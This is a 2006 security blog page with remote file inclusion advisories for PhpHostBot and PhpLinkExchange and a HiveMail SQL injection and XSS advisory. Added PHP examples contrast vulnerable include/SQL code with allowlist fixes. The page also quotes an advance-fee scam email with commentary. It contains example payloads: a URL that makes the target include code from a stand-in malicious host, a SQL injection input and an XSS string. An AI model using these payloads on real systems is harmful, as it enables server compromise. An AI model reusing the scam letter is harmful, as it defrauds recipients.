by r0t, der4444, cembo, VietMafia

Thursday, July 20, 2006

PhpHostBot remote File Inclusion Vuln.

###############################################
Vuln. discovered by : r0t
Date: 20 july 2006
vendor:www.idevspot.com/PhpHostBot.php
affected versions:PhpHostBot 1.0 / AutoHost 3.0
###############################################

Vulnerability Description:

PhpHostBot contains a flaw that allows remote file inclusion, which can be exploited by malicious people to compromise a vulnerable system.
User input passed to the "page" parameter in "order/index.php" is not properly verified before being used to include files. This can be exploited to include and execute scripts from external resources by passing a URL to a remote site, which gives arbitrary PHP code execution with the privileges of the web server whenever PHP permits URL wrappers in include() (allow_url_fopen on the PHP of this time, allow_url_include on PHP 5.2 and later).

example:

http://[victim]/order/index.php?page=http://[malicious_site]/file

###############################################
Solution:
Edit the source code so that the "page" parameter is validated against a fixed list of local page names before it reaches include(). Until the code is fixed, disabling URL wrappers for include in php.ini (allow_url_fopen, or allow_url_include on PHP 5.2 and later) blocks the remote variant, but not local file inclusion.
###############################################
More information @ unsecured-systems.com/forum/

PhpLinkExchange remote File Inclusion Vuln.

###############################################
Vuln. discovered by : r0t
Date: 20 july 2006
vendor:www.idevspot.com/PhpLinkExchange.php
affected versions: 1.0 and prior
###############################################

Vulnerability Description:

PhpLinkExchange contains a flaw that allows remote file inclusion, which can be exploited by malicious people to compromise a vulnerable system.
User input passed to the "page" parameter in "index.php" is not properly verified before being used to include files. This can be exploited to include and execute scripts from external resources by passing a URL to a remote site, with the same consequences as in PhpHostBot above: arbitrary PHP code execution as the web server user when PHP permits URL wrappers in include().

example:

http://[victim]/index.php?page=http://[malicious_site]/file

###############################################
Solution:
Edit the source code so that the "page" parameter is validated against a fixed list of local page names before it reaches include(). Disabling URL wrappers for include in php.ini is a stopgap for the remote variant only.
###############################################
More information @ unsecured-systems.com/forum/
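The following is an added example written for this page; it is not code from PhpHostBot or PhpLinkExchange (idevspot's source is not reproduced here) and it serves both advisories above. It shows the flaw class they describe, an unchecked "page" parameter handed to include(), the common non-fix of appending an extension, and the allowlist form that the solution sections call for. The page names and template paths are assumed for illustration.

```php
<?php
// Added example; not PhpHostBot/PhpLinkExchange code. Page names and
// template paths below are assumed for illustration.

// The pattern the advisories describe: whatever arrives in ?page=
// is handed to include(). With URL wrappers permitted for include
// (allow_url_fopen on the PHP of 2006, allow_url_include on 5.2+),
// ?page=http://malicious_site/file fetches and executes remote PHP.
function include_page_vulnerable(): void {
    include($_GET['page']);
}

// Appending an extension does NOT fix it: for http://malicious_site/file?
// the ".php" suffix lands in a query string the attacker's server ignores,
// and on PHP before 5.3.4 a %00 byte truncates the path entirely.
function include_page_still_vulnerable(): void {
    include($_GET['page'] . '.php');
}

// Fix: user input only selects an entry from a fixed map and never becomes
// part of the path. Unknown keys (URLs, ../, php:// wrappers, null bytes)
// and non-string input (page[]=) fall back to the default page.
const PAGES = [
    'home'  => 'pages/home.php',
    'order' => 'pages/order.php',
    'links' => 'pages/links.php',
];

function resolve_page($requested): string {
    if (!is_string($requested) || !isset(PAGES[$requested])) {
        return PAGES['home'];
    }
    return PAGES[$requested];
}

function include_page_safe(): void {
    include(resolve_page($_GET['page'] ?? null));
}

// Constructed inputs, including the payload from the advisories:
assert(resolve_page('order') === 'pages/order.php');
assert(resolve_page('http://malicious_site/file') === 'pages/home.php');
assert(resolve_page("../../../../etc/passwd\0") === 'pages/home.php');
assert(resolve_page('php://input') === 'pages/home.php');
assert(resolve_page(['x']) === 'pages/home.php');
```

The map is the whole point: once the request string is only ever used as an array key, there is nothing left to sanitise, and new pages are added by editing the map rather than by trusting the filesystem layout. When hunting for this class in other idevspot-style scripts, grep for include/require whose argument is built from $_GET, $_POST or $_REQUEST, and check access logs for "page=http" to see whether it has already been tried against you.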

Tuesday, July 11, 2006

HiveMail multiple vulns.

###############################################
Vuln. discovered by : r0t
Date: 11 july 2006
vendor:http://hivemail.com/
affected versions:
tested on versions 1.3 and 1.2;
other versions may also be affected.
###############################################

Vuln. Description:

1.
HiveMail contains a flaw that allows remote SQL injection attacks. Input passed to the "fields[]" parameter in "search.results.php" is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code; note that "fields[]" is an array parameter, so every element of the array reaches the query, not just a single value.

2.
HiveMail contains a flaw that allows remote cross-site scripting attacks. Input passed to the "email", "cond" and "name" parameters in "addressbook.view.php", to the "daysprune" parameter in "index.php", to the "data[to]" parameter in "compose.email.php" and to the "markas" parameter in "read.markas.php" is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.

3.
It is also possible to disclose the full installation path of "search.results.php" by supplying the "searchdate" and "folderids" parameters.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised: accept in "fields[]" only column names from a fixed list and bind the remaining values as query parameters, HTML-encode every user-controlled value before it is written into a page, and turn display_errors off so that error messages do not reveal paths.
###############################################
More information @ unsecured-systems.com/forum/
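An added example for the three HiveMail items, written for this page and not taken from HiveMail (its search.results.php is not shown here); the table and column names are assumed. It shows why an array parameter such as "fields[]" spliced into SQL is injectable, the allowlist-plus-bound-parameter form that closes it, the output encoding that addresses the reflected XSS, and the php.ini setting behind the path disclosure class.

```php
<?php
// Added example; not HiveMail code. Table and column names are assumed.

// Item 1, the flaw class: each element of ?fields[]=... is spliced into
// the WHERE clause as a column name, so the user controls SQL syntax.
function build_search_sql_unsafe(array $fields, string $term): string {
    $clauses = [];
    foreach ($fields as $column) {
        $clauses[] = "$column LIKE '%$term%'";
    }
    return "SELECT id, subject FROM messages WHERE " . implode(' OR ', $clauses);
}

// fields[]=1=1 OR subject turns the query into "WHERE 1=1 OR subject LIKE ...",
// matching every row; a UNION in the same position reads other tables.
assert(
    build_search_sql_unsafe(['1=1 OR subject'], 'x')
    === "SELECT id, subject FROM messages WHERE 1=1 OR subject LIKE '%x%'"
);

// Hardened: column names cannot be bound as parameters, so they are taken
// only from an allowlist; the search term becomes a bound placeholder.
const SEARCHABLE = ['subject', 'body', 'fromaddr'];

function build_search_sql_safe(array $fields): array {
    $strings = array_filter($fields, 'is_string');     // drop fields[][]=...
    $columns = array_values(array_intersect(SEARCHABLE, $strings));
    if ($columns === []) {
        $columns = ['subject'];   // nothing valid requested: default column
    }
    $clauses = array_map(fn(string $c): string => "$c LIKE ?", $columns);
    $sql = "SELECT id, subject FROM messages WHERE " . implode(' OR ', $clauses);
    return [$sql, count($columns)];   // bind the term once per placeholder
}

function run_search(PDO $db, array $fields, string $term): array {
    [$sql, $n] = build_search_sql_safe($fields);
    $stmt = $db->prepare($sql);
    $stmt->execute(array_fill(0, $n, "%$term%"));
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

[$sql, $n] = build_search_sql_safe(['body', '1=1 OR subject']);
assert($sql === "SELECT id, subject FROM messages WHERE body LIKE ?");
assert($n === 1);

// Item 2, reflected XSS in email/cond/name/daysprune/data[to]/markas:
// encode every user-controlled value at the point it is written into HTML,
// with ENT_QUOTES so it cannot break out of an attribute either.
function html(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
}
assert(html('<script>alert(1)</script>') === '&lt;script&gt;alert(1)&lt;/script&gt;');
assert(html('" onmouseover="x') === '&quot; onmouseover=&quot;x');

// Item 3, full path disclosure: in PHP this class of leak is a warning or
// notice printed into the page. The advisory does not say which error
// search.results.php raises; whichever it is, keep display_errors off in
// production and send errors to the log instead.
ini_set('display_errors', '0');
ini_set('log_errors', '1');
```

The split in build_search_sql_safe matters: identifiers (column names) can never be parameterised, so they must come from code, while values (the search term) must never be concatenated. Binding "%term%" still lets a user supply SQL LIKE wildcards, which is harmless here but worth knowing if the same query is used for access checks.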

Saturday, July 01, 2006

Scamming


Title:Please, I need to hear from you now

From:Dr. James Ransome
at: 30 June 2006 09:06

Barclays Bank Plc
London, United Kingdom
I am Dr. James Ransome , Senior Credit Officer, Barclays Bank Plc London. I am writing following an opportunity in my office that will be of immense benefit to both of us.
In my department we discovered an abandoned sum of £12.5million British Pounds Sterling (Twelve Million Five Hundred Thousand British Pounds Sterling) in an account that belongs to one of our foreign customers Late Mr. Morris Thompson an American who unfortunately lost his life in the plane crash of Alaska Airlines
Flight 261, which crashed on January 31 2000, including his wife and only daughter. You shall read more about the crash on visiting this website.

Since we got information about his death, we have been expecting his next of kin or relatives to come over and claim his money because the Bank cannot release the funds unless somebody applies for it as next of kin or relation to the deceased as indicated in our banking guidelines.
Unfortunately I learnt that his supposed next of kin being his only daughter died along with him in the plane crash leaving nobody with the knowledge of this fund behind for the claim. It is therefore upon this discovery that I and two other officials in this department now decided to do business with you and release the money to you as the next of kin or beneficiary of the funds for safe keeping and subsequent disbursement since nobody is coming for it and we don't want this money to go back into Government treasury as unclaimed bill.
We agreed that 20% of this money would be for you as foreign partner, while the balance will be for my colleagues and I. We will visit your country for the disbursement according to the percentages indicated above once this money gets into your account. Please be honest to me as trust is our watchword in this transaction.
Note that this transaction is confidential and risk free. As soon as you receive this mail you should contact me by return mail whether or not you are willing to enter into this deal. In the event you are not interested, I sincerely ask that you disregard this email and tell no one about it. I am very careful on truncating my banking career should you mention this to someone else. I hope you can be trusted in this regard.
Please note that all necessary arrangement for the smooth release of these funds to you has been finalized. We will discuss much in details when I do receive your response.
Please in your response include your telephone and fax numbers for a better communication between us.
You can reach me on the email below
Best regards
James Ransome
Email: jamesransome20067@zonai.com




He he, first of all, if someone says he works for some company, that means he will also use that company's email and not one from "zonai.com".
But that is also not the point; with email there are a lot of tricks for getting around that.

The next point is: how, as in this example, does a Barclays bank manager have my email?
Let me answer: your email is collected with spammers' software like a mail grabber.

OK, now we all know that the money is stolen not from a dead American, but from normal living customers of some e-commerce site on the net, or by using some poor IE exploits to get their trojan onto the victim's machine.

For me the interesting point is this: if you say that you believed those gangsters and they used your bank account for their illegal money transfers, then you are not guilty.

But let's say you believed those gangsters, but you were too greedy to be happy with the 20% they offered and you took all the money.

Either way you will end up dealing with your country's legal authorities.

And guess which way is better?

A third one?

 
Copyright (c) 2006 Pridels Sec Crew